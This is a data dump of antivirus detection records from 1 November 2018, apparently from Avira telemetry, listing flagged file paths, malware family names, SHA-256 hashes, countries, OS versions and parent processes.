  Row(detection=Row(filename='dwh585b.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH585B.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:38:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imglng.dll', filepath='C:\\Program Files\\Canon\\My Image Garden\\zh-Hans\\imglng.dll', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='12e1d1acbeb36d045a28570234cead541040c489dae30c63284cb00af28e8ed1', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155911-e1e77c12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155911-E1E77C12', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='000023', filepath='./Malware_20181025/20181025_Total/000023', filesize=320000, name='TR/BitCoinMiner.grbmu.#M0.#R0'), hash='0e92444bdc28dbd0e645cedb0c7f1d81708e2073b7c7567956b7bc665cb6b648', metadata=Row(cmdline=None, country='TW', os_name='Linux', os_vmajor='Ubuntu 14', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-01T02:21:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ok多開器.exe', filepath='c:\\users\\X\\downloads\\okv2 1349\\ok多開器.exe', filesize=1536000, name='HEUR/APC.#M1.#R1'), hash='5260d11003d0bfc913d783d4504f11f914a9fdcdca931faed3a54f82a4c8dc12', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:11:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='feedingfrenzy.exe', filepath='h:\\العاب0\\feedingfrenzy\\FeedingFrenzy.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='1c79d4565b271605f1974e2626eb5cd3c6c8ae5091b3d1b89b0e29a82c5ae12a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:28:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:01:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2090274\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_2198809117.exe', parentsize=2610712, timestamp='2018-11-01T21:58:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kebijakan.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\LPA KEBIJAKAN\\KEBIJAKAN.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='folder.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\DOKUMENTASI SOSIALISASI\\New folder\\folder.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsc4EC5.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T02:07:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141203-0795216a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13cc31a3\\AVSCAN-20181101-140956-FB5DC91F\\AVSCAN-20181101-141203-0795216A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msi7142.tmp', filepath='\\\\?\\C:\\Windows\\Installer\\MSI7142.tmp', filesize=3072000, name='Adware/DealPly.ME.22.#M1.#R1'), hash='9b61cf90b3b8cd80f89ae004b3862efce6b7c141aa8ddf2e5f5633396fd15d2f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='enviacargaredecard.exe', filepath='C:\\Users\\X\\Desktop\\FINANCEIRO\\Pastas Diversas\\Backup SiTef\\2016-04-01-SiTef\\APLIC.WIN\\enviacargaredecard.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='e9edf33dfd617ac9a998b1dc917665dc643a5d140b17963a04f08a50b7d41ec5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:40:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='n.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\SystemMonitor\\n.dll', filesize=9060000, name='PUA/PUA/CPUGuardian.#M1.#R1'), hash='ca7a812237ef6c287bb44e5729273694e0d9108a890fc1f1271589c3d3d335e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nspDD3A.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:11:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách học đtv.exe', filepath='H:\\\xa0\\danh sách học ĐTV.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8d77d0f73874e20bd2cda1bf719dce3ed810abf989c246bb3f193324f0c91c17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T01:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105811-99dc3a3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105811-99DC3A3D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:57:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\2007CAD安装盘\\acadFeui\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a381dfef5929cbc85b788eab3459e90275f329339c74cfdf90bb3ba98832faa', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T22:58:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e478979bf57b60f1a0ebdc232f356eefe677727e', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e478979bf57b60f1a0ebdc232f356eefe677727e', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='cf432f7bea04ab741c0a270ebfca8d9d361f60dbbdf5895257f1345201a21282', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152610-756bd0ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0db57455\\AVSCAN-20181101-152536-71846969\\AVSCAN-20181101-152610-756BD0CA', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190715-06e2cfbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190715-06E2CFBD', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172620-d626363f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172620-D626363F', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='8ae0549ba3ebca1312a0e25fff7693cfe887a2cf59ba78cacd42a4074b7c1b9d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sessionmanager.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\9250.tmp\\Sessionmanager.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\7B5E.tmp\\NVIDIA.exe', parentsize=2208768, timestamp='2018-11-01T01:33:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123955-245fc43d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123933-11EC21E3\\AVSCAN-20181101-123955-245FC43D', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:15:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-01T16:16:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080218-5af89817', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080218-5AF89817', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:02:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='开始游戏.exe', filepath='D:\\downloads\\SPR\\SBPR v1.11.7z\\SBPR v1.11.7z\\开始游戏.exe', filesize=2944000, name='HEUR/AGEN.1009421.#M1.#R1'), hash='9107e1f142e31753482b286c260b0de595da2c084aefa3b4732f35a68360f58d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:56:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rochlitz_shawn.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Rochlitz_Shawn.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='c58b17af2e8cf9d1c9118ecd6aabd0d8c4c8edf7529d60b6ad26b176989adda4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111725-2b6d3f5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111725-2B6D3F5A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='passwords_browsers.htm', filepath='C:\\Program Files\\AVAST Software\\Avast\\resources\\passwords_browsers.htm', filesize=484000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='6966a3691d1d616aa18e8aa5aa50bde017c7a09cf1e4a7b11b3b6eff7abb267e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-01T03:55:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:43:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0004773.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0004773.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:12:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002617-512a3441', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002617-512A3441', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:17:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='F:\\New folder\\Corel Draw 12\\Brazilian Portuguese\\Autorun\\Autorun.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094019-d35094e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cb012c72\\AVSCAN-20181101-093918-CD425284\\AVSCAN-20181101-094019-D35094E9', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:11:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bin2elf.exe', filepath='C:\\Flashtool\\x10flasher_lib\\bin2elf.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='1cc0898f5cb28f881016a39aa54fed4a5aacbc0e7de849d186f3efa30209d73d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T13:09:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:38:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='#new hack ghost wolf v1.0.3[vip].exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\#New Hack Ghost Wolf V1.0.3[VIP]\\#New Hack Ghost Wolf V1.0.3[VIP].exe', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T16:38:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193409-50b06b71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ecc6b11a\\AVSCAN-20181101-193351-4D97EBF5\\AVSCAN-20181101-193409-50B06B71', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220929-d0019e2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dc006c7c\\AVSCAN-20181101-220845-C9DFB227\\AVSCAN-20181101-220929-D0019E2A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:09:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:48:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174243-fec65355', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-174243-FEC65355', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:42:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:39:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001b09', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001b09', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184132-df722476', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-184105-DBEFCA95\\AVSCAN-20181101-184132-DF722476', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:41:29Z'), dt=datetime.date(2018, 11, 1)),
